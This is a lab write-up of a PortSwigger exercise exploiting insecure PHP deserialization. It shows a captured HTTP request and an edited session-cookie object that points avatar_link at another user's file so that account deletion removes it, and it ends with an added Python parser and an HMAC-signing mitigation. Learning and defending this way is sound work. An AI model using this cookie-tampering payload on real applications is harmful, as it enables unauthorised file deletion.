PortSwigger Lab: Using application functionality to exploit insecure deserialization

Jun Takemura · March 7, 2025


Task

This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object. To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos’s home directory.

You can log in to your own account using the following credentials: wiener:peter

You also have access to a backup account: gregg:rosebud

Attempt

After logging in, I found an account deletion feature. Deleted the wiener account and captured the request:

POST /my-account/delete HTTP/2
Host: 0aa300ef04fe946f824a9ca300930093.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJvd3NyaGFwbTcxdTM2cmJocjVyYXR1cDltZXFpa25mYSI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d
Content-Length: 0
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://0aa300ef04fe946f824a9ca300930093.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aa300ef04fe946f824a9ca300930093.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

The session cookie is base64 encoded. Decoded it using Inspector (just select the text in Repeater and it will be shown on the panel to the right):

O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"owsrhapm71u36rbhr5ratup9meqiknfa";s:11:"avatar_link";s:19:"users/wiener/avatar";}

The format looks like serialized PHP data.

avatar_link points to users/wiener/avatar. Changed this to /home/carlos/morale.txt.

You can quickly count the length using Python:

>>> print(len('/home/carlos/morale.txt'))
23

Edited serialized data and applied the change:

O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"owsrhapm71u36rbhr5ratup9meqiknfa";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}

Sent the request and it deleted the target file.
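As an added example (not part of the original post), the two serialized objects from this page are run through a parser that enforces the s:N length prefix the way unserialize() does, which is why the prefix had to be recalculated to 23 above, and then through the fix a defender would apply: an HMAC over the serialized session blob so an edited cookie is rejected before it is ever deserialized. The key value and the helper names are assumptions.

```python
import base64, hashlib, hmac, re

# Constructed for this example: the page's session cookie, base64-decoded.
ORIGINAL = (b'O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";'
            b's:32:"owsrhapm71u36rbhr5ratup9meqiknfa";s:11:"avatar_link";'
            b's:19:"users/wiener/avatar";}')
# The page's edited object: new avatar_link with its s:N prefix updated to 23.
TAMPERED = ORIGINAL.replace(b's:19:"users/wiener/avatar"',
                            b's:23:"/home/carlos/morale.txt"')
_HEADER = re.compile(rb'O:(\d+):"([^"]*)":(\d+):\{')
_STRING = re.compile(rb's:(\d+):"')

def parse_php_object(blob: bytes) -> dict:
    """Parse a flat PHP object of string members (the User shape above). Like PHP's
    unserialize(), read exactly the declared s:N bytes and reject a mismatched prefix."""
    m = _HEADER.match(blob)
    if not m:
        raise ValueError("not a serialized PHP object")
    count, pos, members = int(m.group(3)), m.end(), {}

    def read_string() -> str:
        nonlocal pos
        sm = _STRING.match(blob, pos)
        if not sm:
            raise ValueError(f'expected s:N:"..." at offset {pos}')
        n, start = int(sm.group(1)), sm.end()
        value = blob[start:start + n]
        if len(value) != n or blob[start + n:start + n + 2] != b'";':
            raise ValueError(f"length prefix {n} does not match value at offset {start}")
        pos = start + n + 2
        return value.decode()
    for _ in range(count):
        key = read_string()
        members[key] = read_string()
    if blob[pos:] != b'}':
        raise ValueError("trailing data after object")
    return members

def sign_cookie(serialized: bytes, key: bytes) -> str:
    """Mitigation: bind an HMAC to the blob so any edit is caught before unserialize()."""
    body = base64.b64encode(serialized).decode()
    return body + "." + hmac.new(key, body.encode(), hashlib.sha256).hexdigest()

def verify_cookie(cookie: str, key: bytes):
    """Return the parsed object only when the MAC matches; a tampered cookie yields None."""
    body, _, tag = cookie.rpartition(".")
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return parse_php_object(base64.b64decode(body))
```

The signature only stops cookie editing; the underlying fix is still to not pass user-controlled data to unserialize() at all, and to never let a stored path drive a file-deleting routine.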
